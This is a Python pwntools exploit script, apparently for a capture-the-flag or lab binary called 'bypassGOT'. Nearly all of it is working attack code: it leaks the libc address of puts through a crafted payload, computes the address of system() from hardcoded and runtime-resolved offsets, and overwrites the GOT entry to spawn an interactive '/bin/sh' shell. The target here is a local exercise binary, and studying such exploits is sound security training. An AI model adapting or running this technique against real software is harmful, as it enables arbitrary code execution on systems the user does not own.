#!/usr/bin/python

from pwn import *


# GOT slot of puts in the target binary; the only module constant main() uses.
puts_got = 0x0804c018
# ./dump libc6-i386_2.32-4_amd64
# Offsets below were taken from the libc dump named above. main() does not
# read the system/puts values from here: it resolves them at runtime from the
# host's /lib/i386-linux-gnu/libc.so.6 via ELF().symbols, so these only match
# when that file is the same build as the dump — TODO confirm before relying
# on them. The remaining offsets are not referenced anywhere in this file.
offset___libc_start_main_ret = 0x1efd6
offset_system = 0x00045120
offset_dup2 = 0x000f3040
offset_puts = 0x0006f7b0
offset_read = 0x000f22d0
offset_write = 0x000f2390
offset_str_bin_sh = 0x18f924

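def _extract_leak(data: bytes) -> bytes:
    """Return the bytes enclosed by the first ``(`` … ``)`` pair in *data*.

    The original parse took ``data[find("(")+1:find(")")]`` unchecked, so a
    reply without both delimiters produced an empty or garbage slice and the
    failure surfaced later as an unrelated ``u32`` error or a wrong address.

    Args:
        data: raw bytes received from the target after the first payload.

    Returns:
        The slice between the delimiters, at least four bytes long.

    Raises:
        ValueError: if either delimiter is missing or the enclosed span is
            shorter than the four bytes ``u32`` consumes.
    """
    left = data.find(b"(")
    # Search for the closing delimiter only after the opening one; a ')'
    # byte (0x29) inside the leaked value would still truncate it here, as
    # it did in the original parse.
    right = data.find(b")", left + 1) if left != -1 else -1
    if left == -1 or right == -1:
        raise ValueError("leak delimiters not found in %r" % (data,))
    leak = data[left + 1:right]
    if len(leak) < 4:
        raise ValueError("leak too short for u32: %r" % (leak,))
    return leak


def main():
    """Drive the bypassGOT exercise against a locally spawned process.

    Steps, in order: resolve the ``system`` and ``puts`` offsets from the
    host libc, send the first-stage payload (``/bin/sh`` padded to 24 bytes
    followed by the ``puts`` GOT address), parse the four-byte leak out of
    the reply, compute the libc base and the ``system`` address from it,
    send that address as the second stage, then hand the session to the
    user with ``interactive()``.

    Raises:
        ValueError: from ``_extract_leak`` when the reply cannot be parsed,
            so a bad leak is reported instead of silently continuing.
    """
    e = ELF('/lib/i386-linux-gnu/libc.so.6')

    # Resolved from the host libc at runtime. Distinct local names avoid
    # shadowing the module-level offset_* constants, which are derived from
    # a separate dump and are not used here.
    libc_system = e.symbols['system']
    libc_puts = e.symbols['puts']

    log.info("system() offset: %#x" % libc_system)
    log.info("puts() offset: %#x" % libc_puts)

    p = process("./bypassGOT")
    try:
        # Initial output is discarded; only the reply to the payload matters.
        p.recv()
        # 24 bytes of "/bin/sh" plus NUL padding, then the puts GOT address.
        # ljust() yields exactly the bytes the original concatenation built.
        payload = b"/bin/sh".ljust(24, b"\x00") + p32(puts_got)
        p.send(payload)
        # NOTE(review): a single recv() may return a partial reply; the
        # delimiter check in _extract_leak() will reject it rather than
        # misparse it.
        data = p.recv()
        log.info("Data Captured: %s", data)

        leak = _extract_leak(data)
        log.info("leaked information is: %s", leak)
        puts_libc = u32(leak[:4])
        log.info("puts@libc: 0x%x", puts_libc)

        libc_base = puts_libc - libc_puts
        system_libc = libc_base + libc_system
        log.info("system@libc: 0x%x", system_libc)

        p.send(p32(system_libc))
        p.interactive()
    finally:
        # Always release the child process, even when parsing fails above.
        p.close()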




# Script entry point: run the exploit only when executed directly, not on import.
if __name__ == "__main__":
    main()
